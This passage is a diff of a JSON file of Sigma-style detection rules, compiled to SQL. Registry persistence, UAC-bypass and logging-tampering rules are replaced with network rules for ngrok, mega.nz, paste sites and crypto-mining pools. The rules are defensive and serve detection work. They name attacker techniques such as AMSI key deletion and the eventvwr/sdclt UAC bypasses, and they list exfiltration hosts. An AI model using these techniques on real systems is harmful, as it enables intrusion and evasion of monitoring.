'%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. 
This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", - "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' 
ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. 
In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": 
"net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate 
script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft 
Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": 
"Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. 
Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE 
'%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron 
Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 
'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 
'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 